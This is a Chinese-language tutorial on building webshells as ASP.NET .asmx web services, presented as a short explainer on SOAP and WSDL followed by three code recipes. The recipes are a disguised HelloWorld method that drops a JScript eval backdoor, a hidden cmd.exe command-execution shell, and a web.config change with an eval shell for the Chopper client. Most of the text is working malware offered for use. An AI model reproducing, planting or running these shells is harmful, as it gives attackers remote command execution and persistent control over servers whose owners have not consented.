Web Service是一個基於可編程的web的應用程序,用於開發分布式的互操作的應用程序,也是一種web服務,Web Service的主要目標是跨平台的可互操作性,為了實現這一目標Web Service 完全基於XML(可擴展標記語言)、XSD(XML Schema)等獨立於平台、獨立於軟件供應商的標准,是創建可互操作的、分布式應用程序的新平台。簡單的來說Web Service具備三個要素SOAP(Simple Object Access Protocol)、WSDL(WebServicesDescriptionLanguage)、UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAP用來描述傳遞信息的格式, WSDL 用來描述如何訪問具體的接口, UDDI用來管理,分發查詢webService ,也因此使用Web Service有許多優點,例如可以跨平台工作、部署升級維護起來簡單方便、實現多數據多個服務的聚合使用等等。再結合下圖說明一下WebService工作的流程
在Web Service程序中,如果一個公共方法想被外界訪問調用的話,就需要加上WebMethod
這是一個默認的web server
那么我們如果再hellword里面構造我們的危險方法
tip一 創建文件
<%@ WebService Language="C#" Class="WebService1" %> using System.IO; using System.Collections; using System.ComponentModel; using System.Data; using System.Diagnostics; using System.Web; using System.Web.Services; [WebService(Namespace = "http://tempuri.org/")] [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line. // [System.Web.Script.Services.ScriptService] public class WebService1 : System.Web.Services.WebService { public WebService1() { // // TODO: Add any constructor code required // } // WEB SERVICE EXAMPLE // The HelloWorld() example service returns the string Hello World. [WebMethod] public string HelloWorld(string input) { StreamWriter helloshell = File.CreateText(HttpContext.Current.Server.MapPath(input)); helloshell.Write("<%@ WebService Language=\"Jscript\"%><%eval(Request.Item[\"a\"]);%>"); helloshell.Flush(); helloshell.Close(); return "helloshell"; } }
tips2--cmd執行命令小馬(c#版)
<%@ WebService Language="C#" Class="WebService1" %>
using System.IO;
using System.Collections;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Web;
using System.Web.Services;
[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
// To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line.
// [System.Web.Script.Services.ScriptService]
public class WebService1 : System.Web.Services.WebService
{
public WebService1()
{
//
// TODO: Add any constructor code required
//
}
// WEB SERVICE EXAMPLE
// The HelloWorld() example service returns the string Hello World.
[WebMethod]
public string HelloWorld(string input)
{
Process oci = new Process();
oci.StartInfo.FileName = "cmd.exe";
oci.StartInfo.RedirectStandardOutput = true;
oci.StartInfo.UseShellExecute = false;//從定向IO流
oci.StartInfo.Arguments = "/c" + input;
oci.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
oci.Start();
StreamReader txt = oci.StandardOutput;
string alltxt = txt.ReadToEnd();
txt.Close();
txt.Dispose();//釋放資源
return alltxt;
}
}
tip3--打造菜刀可連接一句話
這里注意菜刀是get postvalue傳參 並不是sopa協議調用http所以如果需要構造菜刀asmx一句話則web.config設置
<?xml version="1.0" encoding="utf-8"?>
<!--
有關如何配置 ASP.NET 應用程序的詳細信息,請訪問
https://go.microsoft.com/fwlink/?LinkId=169433
-->
<configuration>
<system.web>
<webServices>
<protocols>
<add name="HttpPost"/>
<add name="HttpGet"/>
</protocols>
</webServices>
<compilation debug="true" targetFramework="4.0" />
<customErrors mode="Off"/>
</system.web>
</configuration>
接下來構造菜刀jscript.net一句話
<%@ WebService Language="JScript" Class="WebService1" %>
import System;import System.Web;import System.IO;import System.Web.Services;
import System.Web.Script.Services;
import System.Web;
import System.Web.Services;
public class WebService1 extends WebService
{
WebMethodAttribute ScriptMethodAttribute function Cmdshell(Pass : String) : Void
{
var c = HttpContext.Current;
var Request = c.Request;
var Response = c.Response;
eval(Pass);
}
}
